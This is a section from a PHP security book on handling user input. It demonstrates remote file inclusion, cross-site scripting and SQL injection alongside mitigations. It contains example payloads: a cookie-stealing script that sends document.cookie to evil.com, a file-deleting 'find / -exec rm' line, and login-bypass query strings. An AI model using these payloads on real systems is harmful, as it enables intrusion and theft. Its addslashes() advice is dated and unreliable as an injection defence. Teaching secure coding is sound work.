<html>
<META http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<head>
<title>Section 5.4.&nbsp; Safe-Handling User Input</title>
<link rel="STYLESHEET" type="text/css" href="images/style.css">
<link rel="STYLESHEET" type="text/css" href="images/docsafari.css">
</head>
<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td><div STYLE="MARGIN-LEFT: 0.15in;"><a href="toc.html"><img src="images/teamlib.gif" width="62" height="15" border="0" align="absmiddle"  alt="Team LiB"></a></div></td>
<td align="right"><div STYLE="MARGIN-LEFT: 0.15in;">
<a href=ch05lev1sec3.html><img src="images/previous.gif" width="62" height="15" border="0" align="absmiddle" alt="Previous Section"></a>
<a href=ch05lev1sec5.html><img src="images/next.gif" width="41" height="15" border="0" align="absmiddle" alt="Next Section"></a>
</div></td></tr></table>
<br><table width="100%" border="0" cellspacing="0" cellpadding="0"><TR><td valign="top"><a name="ch05lev1sec4"></a><h3 class="docSection1Title">5.4. Safe-Handling User Input</h3>
<p class="docText">Trust nobody, especially not the users of your web application. Users always do unexpected things, whether on purpose or by accident, and thus might find bugs or security holes in your site. In the following sections, we first show some of the major problems that may cause your site to sustain attacks. Then, we talk about some techniques to deal with the problems.<a name="ch05index43"></a><a name="ch05index44"></a><a name="ch05index45"></a></p>
<a name="ch05lev2sec1"></a><h4 class="docSection2Title">5.4.1. Common Mistakes</h4>
<p class="docText">A certain set of mistakes are often made. If you read security-related mailing lists (such as Bugtraq, <a class="docLink" target="_blank" href="http://www.securityfocus.com/archive/1">http://www.securityfocus.com/archive/1</a>), you will notice at least a few vulnerabilities in PHP applications every week.<a name="ch05index46"></a><a name="ch05index47"></a><a name="ch05index48"></a><a name="ch05index49"></a></P>
<a name="ch05lev3sec1"></a><h5 class="docSection3Title">5.4.1.1 Global Variables</H5>
<p class="docText">One basic mistake is not initializing global variables properly. Setting the <tt>php.ini</tt> directive <tt>'register_globals'</tt> to <tt>Off</tt> (the default since PHP 4.2) protects against this mistake, but you still need to watch for the problem. Your application might be used by other users who have <tt>register_globals</tt> set to <tt>On</tt>. Let's illustrate what can happen if you don't initialize your variables with a basic example:<a name="ch05index50"></a><a name="ch05index51"></a><a name="ch05index52"></a><a name="ch05index53"></a><a name="ch05index54"></a><a name="ch05index55"></a><a name="ch05index56"></a></p>
<pre>
&lt;?php
session_start();

/* $admin is a session variable set earlier by an authentication
 * script */
 if (!$admin) {
    do_foo();
} else {
    do_admin_task();
}
?&gt;
</pre><BR>
<p class="docText">Although this looks like a simple thing, it can be overlooked in more complex scripts. In our example, not much harm is possible. The only thing that an attacker could do is use your web application with administrator rights. Far more severe problems can arise when you dynamically include files with the <tt>include()</tt> or <tt>require()</tt> functions in PHP. Consider the following (simplified) example:</p>
<pre>
&lt;?php
include $module. '.php';
?&gt;
</pre><br>
<p class="docText">This script makes it possible for an attacker to execute arbitrary PHP code on your server, by simply appending <tt>?module=http://example.com/evilscript</tt> to the URL in the browser. When PHP receives this URL, it sets <tt>$module</tt> equal to http://example.com/evilscript.php. When PHP executes the <tt>include()</tt> function, it tries to include the <tt>evilscript.php</tt> from example.com (which should not parse it, of course) and execute the PHP code in <tt>evilscript.php</tt>. <tt>evilscript.php</tt> might contain <tt>&lt;?php 'find / -exec rm "{}" ";"'; ?&gt;</tt>, code that would remove all files accessible by the web server.</p>
<p class="docText">The first of these exploits can be solved by using <tt>$_SESSION['admin']</tt> or setting the <tt>register_globals php.ini</tt> setting to <tt>Off</tt>. The second can be solved by checking whether the file exists on the local machine before including it, as in the following code:<a name="ch05index57"></a><a name="ch05index58"></a><a name="ch05index59"></a><a name="ch05index60"></a><a name="ch05index61"></a><a name="ch05index62"></a></p>
<pre>
&lt;?php
if (file_exists($module. '.php')) {
    include $module. '.php';
}
?&gt;
</pre><BR>
<a name="ch05lev3sec2"></a><H5 class="docSection3Title">5.4.1.2 Cross-Site Scripting</h5>
<p class="docText">By using the <span class="docEmphStrong">cross-site scripting</span> technique, an attacker might be able to execute pieces of client-side scripting languages, such as JavaScript, and steal cookies or other sensitive data. Cross-site scripting is really not hard. The attacker only needs a way to insert raw data into the HTML of the site. For example, the attacker might enter <tt>&lt;script language="JavaScript"&gt;alert();&lt;/script&gt;</tt> into an input box that does not strip any HTML tags. The following script illustrates this possibility:<a name="ch05index63"></a><a name="ch05index64"></a><a name="ch05index65"></a><a name="ch05index66"></a><a name="ch05index67"></a><a name="ch05index68"></a></p>
<pre>
&lt;html&gt;
&lt;head&gt;&lt;title&gt;XSS example&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;form&gt;
  &lt;input name='foo' value='&lt;?php echo $_GET['foo']; ?&gt;'&gt;
&lt;/form&gt;
&lt;/html&gt;
</pre><br>
<p class="docText">It's a straightforward script. Suppose the attacker types the following into your form field:</p>
<pre>
'&gt;&lt;script language='JavaScript'&gt;alert('boo!');&lt;/script&gt;&lt;a b='
</pre><BR>
<p class="docText">The JavaScript code results in the pop-up shown in <a class="docLink" href="#ch05fig02">Figure 5.2</a>.</p>
<a name="ch05fig02"></a><p><center><H5 class="docFigureTitle">Figure 5.2. Effects of JavaScript in unchecked input.</h5>
<p class="docText"><img border="0" alt="" width="350" height="93" SRC="images/013147149X/graphics/05fig02.gif;380137"></P></center></p><br>
<p class="docText">Of course, this is not scary. However, suppose instead of this innocent pop-up, the following is input:<a name="ch05index69"></a><a name="ch05index70"></a><a name="ch05index71"></a><a name="ch05index72"></a><a name="ch05index73"></a><a name="ch05index74"></a></p>
<pre><a name="PLID5"></a><div class="v1"><a href="ch05lev1sec4.html#PLID5">[View full width]</a></div>
'&gt;&lt;script language='JavaScript'&gt;document.location= 'http://evil.com/cgi-bin/cookie
<img border="0" width="14" height="9" alt="" align="left" src="images/ccc.gif">.cgi?f='+document.cookie&lt;/script&gt;&lt;a b='
</pre><br>
<p class="docText">When a user is tricked into activating this URL, the contents of your cookie are sent to the evil.com guys. Of course, a user is not likely to click a URL with evil.com in it, but the bad guys can change the "evil.com" to an URL-encoded form that would look less "weird," especially to beginning Internet users.</p>
<a name="ch05lev3sec3"></a><h5 class="docSection3Title">5.4.1.3 SQL Injection</h5>
<p class="docText"><span class="docEmphStrong">SQL Injection</span> is a method in which an attacker inserts malicious code into queries that run on your database. Have a look at this example:<a name="ch05index75"></a><a name="ch05index76"></a><a name="ch05index77"></a><a name="ch05index78"></a><a name="ch05index79"></a></p>
<pre>
&lt;?php
    $query = "SELECT login_id FROM users WHERE user='$user' AND pwd='$pw'";
    mysql_query($query);
?&gt;
</pre><br>
<p class="docText">Voil&agrave;! Anyone can log in as any user, using a query string like http://example.com/login.php?user=admin'%20OR%20(user='&amp;pwd=') %20OR%20user=', which effectively calls the following statements:</p>
<pre>
&lt;?php
    $query = "SELECT login_id FROM users WHERE
        user='admin' OR (user = '' AND pwd='') OR user=''";
    mysql_query($query);
?&gt;
</pre><br>
<p class="docText">It's even simpler with the URL http://example.com/login.php?user=admin'%23, which executes the query <tt>SELECT login_id FROM users WHERE user='admin'#' AND pwd=''</tt>. Note that the <tt>#</tt> marks the beginning of a comment in SQL.</p>
<p class="docText">Again, it's a simple attack. Fortunately, it's also easy to prevent. You can sanitize the input using the <tt>addslashes()</tt> function that adds a slash before every single quote (<tt>'</tt>), double quote (<tt>"</tt>), backslash (<tt>\</tt>), and NUL (<tt>\0</tt>). Other functions are available to sanitize input, such as <tt>strip_tags()</tt>.<a name="ch05index80"></a><a name="ch05index81"></a><a name="ch05index82"></a><a name="ch05index83"></a><a name="ch05index84"></a></p>
<a href="28981535.html"><img src="images/pixel.gif" alt="" width="1" height="1" border="0"></a><ul></ul></td></TR></table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td><div STYLE="MARGIN-LEFT: 0.15in;"><a href="toc.html"><img src="images/teamlib.gif" width="62" height="15" border="0" align="absmiddle"  alt="Team LiB"></a></div></td>
<td align="right"><div STYLE="MARGIN-LEFT: 0.15in;">
<a href=ch05lev1sec3.html><img src="images/previous.gif" width="62" height="15" border="0" align="absmiddle" alt="Previous Section"></a>
<a href=ch05lev1sec5.html><img src="images/next.gif" width="41" height="15" border="0" align="absmiddle" alt="Next Section"></a>
</div></td></tr></table>
</body></html>